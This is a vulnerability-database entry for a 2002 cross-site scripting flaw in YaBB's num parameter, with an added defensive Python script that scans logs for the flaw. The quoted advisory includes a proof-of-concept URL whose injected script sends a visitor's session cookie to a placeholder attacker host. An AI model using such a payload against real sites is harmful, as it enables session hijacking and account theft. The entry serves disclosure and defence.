YaBB YaBB.pl Cross-Site Scripting Vulnerability


Vulnerability ID: 1107116 Vulnerability type: Cross-site scripting
Published: 2002-11-28 Updated: 2002-12-31
CVE ID: CVE-2002-2296
CNNVD-ID: CNNVD-200212-162
Platform: CGI CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/22052
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-162
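|Vulnerability details
YaBB.pl in Yet Another Bulletin Board (YaBB) 1 Gold SP1 contains a cross-site scripting vulnerability. A remote attacker can inject arbitrary web script or HTML via the num parameter.
|Exploit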
source: http://www.securityfocus.com/bid/6272/info

A cross-site scripting vulnerability has been reported in the YaBB forum. This vulnerability is due to insufficient sanitization of URI parameters in some scripts.

As a result, it is possible for a remote attacker to create a malicious link to the login page of a site hosting the web forum. When this link is visited by an unsuspecting web user, the attacker-supplied code will be executed in their browser in the security context of the vulnerable website.

It has been demonstrated that this vulnerability may be exploited to steal cookie-based authentication credentials.

http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>
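
A log check for the issue described above, as an added example that is not part of the original advisory or of YaBB's code: it parses YaBB's `;`-separated query string and flags any request to YaBB.pl whose `num` value is not digits only. It assumes legitimate `num` values are purely numeric, as in the URL shown on this page; the log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2002:10:00:00 +0000] "GET /foro/YaBB.pl?board=gral;action=display;num=10360245269 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Dec/2002:10:02:13 +0000] "GET /foro/YaBB.pl?board=gral;action=display;num=10360245269%3CScript%3Ex%3C/Script%3E HTTP/1.0" 200 5391',
    '192.0.2.45 - - [01/Dec/2002:10:03:40 +0000] "GET /foro/YaBB.pl?board=gral&action=display&num=12%253Cb%253E HTTP/1.0" 200 5200',
    '192.0.2.46 - - [01/Dec/2002:10:04:02 +0000] "GET /index.html?num=abc HTTP/1.0" 200 812',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def yabb_params(query):
    """Split a query string on ';' (the separator in the URL above) and on '&'
    (accepted defensively so a separator mismatch cannot hide a parameter)."""
    params = {}
    for pair in re.split(r"[;&]", query):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(unquote(name), []).append(unquote(value))
    return params

def bad_num_values(request_target):
    """Return decoded num values that are not digits only (allowlist check)."""
    path, _, query = request_target.partition("?")
    if not path.lower().endswith("/yabb.pl"):
        return []
    # Allowlist: anything other than ASCII digits is flagged, so markup,
    # quotes and double-encoded input ("%253C" decodes to "%3C") all fail.
    return [v for v in yabb_params(query).get("num", []) if not re.fullmatch(r"[0-9]+", v)]

def scan(lines):
    """Return (line_number, offending_value) for each flagged request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((lineno, value) for value in bad_num_values(match.group(1)))
    return hits

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-numeric num value {value!r}")
```

The same digits-only allowlist is what a server-side fix would enforce on `num` before the value is echoed into a page, together with HTML-encoding on output.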
|References

Source: XF
Name: yabb-xphp-xss(10737)
Link: http://xforce.iss.net/xforce/xfdb/10737
Source: BID
Name: 6272
Link: http://www.securityfocus.com/bid/6272
Source: BUGTRAQ
Name: 20021201 Cross-site Scripting Vulnerability in YaBB 1 Gold-SP1!
Link: http://archives.neohapsis.com/archives/bugtraq/2002-12/0003.html
